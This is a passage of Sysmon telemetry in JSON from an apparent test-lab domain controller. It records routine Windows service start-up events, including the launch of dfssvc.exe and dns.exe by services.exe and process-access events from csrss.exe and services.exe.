(rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.392","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"2660","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\services.exe+12bee|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1237,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.392\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.392","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1238,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.382\r\nProcessGuid: {E2A3D6B1-106B-5F25-0000-001051C90200}\r\nProcessId: 3084\r\nImage: C:\\Windows\\System32\\dfssvc.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows NT Distributed File System Service\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: dfssvc.exe\r\nCommandLine: C:\\Windows\\system32\\dfssvc.exe\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=304155A24E5273CF68197B30112D451A,SHA256=EC48F117C47F0E4BD5F7407629CE8CF78579764A7947CA05EDC089B59B941576,IMPHASH=C8B32AEEF22A97D88BD68D70385A1B30\r\nParentProcessGuid: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nParentProcessId: 852\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.382","ProcessGuid":"{E2A3D6B1-106B-5F25-0000-001051C90200}","Image":"C:\\Windows\\System32\\dfssvc.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows NT Distributed File System Service","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"dfssvc.exe","CommandLine":"C:\\Windows\\system32\\dfssvc.exe","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=304155A24E5273CF68197B30112D451A,SHA256=EC48F117C47F0E4BD5F7407629CE8CF78579764A7947CA05EDC089B59B941576,IMPHASH=C8B32AEEF22A97D88BD68D70385A1B30","ParentProcessGuid":"{E2A3D6B1-1058-5F25-0000-001030530000}","ParentProcessId":"852","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1239,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.396\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 1244\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C90200}\r\nTargetProcessId: 3084\r\nTargetImage: C:\\Windows\\system32\\dfssvc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.396","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"1244","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C90200}","TargetProcessId":"3084","TargetImage":"C:\\Windows\\system32\\dfssvc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1240,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.396\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C90200}\r\nTargetProcessId: 3084\r\nTargetImage: C:\\Windows\\system32\\dfssvc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.396","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C90200}","TargetProcessId":"3084","TargetImage":"C:\\Windows\\system32\\dfssvc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1241,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.366\r\nProcessGuid: {E2A3D6B1-106B-5F25-0000-001027C70200}\r\nProcessId: 2636\r\nImage: C:\\Windows\\System32\\dns.exe\r\nFileVersion: 10.0.14393.3808 (rs1_release.200707-2105)\r\nDescription: Domain Name System (DNS) Server\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: dns.exe\r\nCommandLine: C:\\Windows\\system32\\dns.exe\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=D12C4522E932461612C72B4EB7A4B3A1,SHA256=BC06AE025E1CDEF4304F0D7983A80D029B6CCBF5761EAB490847100FD161D6FA,IMPHASH=F11D7ACAC98040FCC69808598F92C5FA\r\nParentProcessGuid: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nParentProcessId: 852\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.366","ProcessGuid":"{E2A3D6B1-106B-5F25-0000-001027C70200}","Image":"C:\\Windows\\System32\\dns.exe","FileVersion":"10.0.14393.3808 (rs1_release.200707-2105)","Description":"Domain Name System (DNS) Server","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"dns.exe","CommandLine":"C:\\Windows\\system32\\dns.exe","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=D12C4522E932461612C72B4EB7A4B3A1,SHA256=BC06AE025E1CDEF4304F0D7983A80D029B6CCBF5761EAB490847100FD161D6FA,IMPHASH=F11D7ACAC98040FCC69808598F92C5FA","ParentProcessGuid":"{E2A3D6B1-1058-5F25-0000-001030530000}","ParentProcessId":"852","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1242,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.400\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 936\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001027C70200}\r\nTargetProcessId: 2636\r\nTargetImage: C:\\Windows\\system32\\dns.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.400","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"936","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001027C70200}","TargetProcessId":"2636","TargetImage":"C:\\Windows\\system32\\dns.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1243,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.400\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001027C70200}\r\nTargetProcessId: 2636\r\nTargetImage: C:\\Windows\\system32\\dns.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.400","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001027C70200}","TargetProcessId":"2636","TargetImage":"C:\\Windows\\system32\\dns.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1244,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.401\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 912\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C90200}\r\nTargetProcessId: 3084\r\nTargetImage: C:\\Windows\\system32\\dfssvc.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.401","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"912","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C90200}","TargetProcessId":"3084","TargetImage":"C:\\Windows\\system32\\dfssvc.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1245,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.417\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 1244\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001027C70200}\r\nTargetProcessId: 2636\r\nTargetImage: C:\\Windows\\system32\\dns.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.417","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"1244","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001027C70200}","TargetProcessId":"2636","TargetImage":"C:\\Windows\\system32\\dns.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1246,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.420\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 1244\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 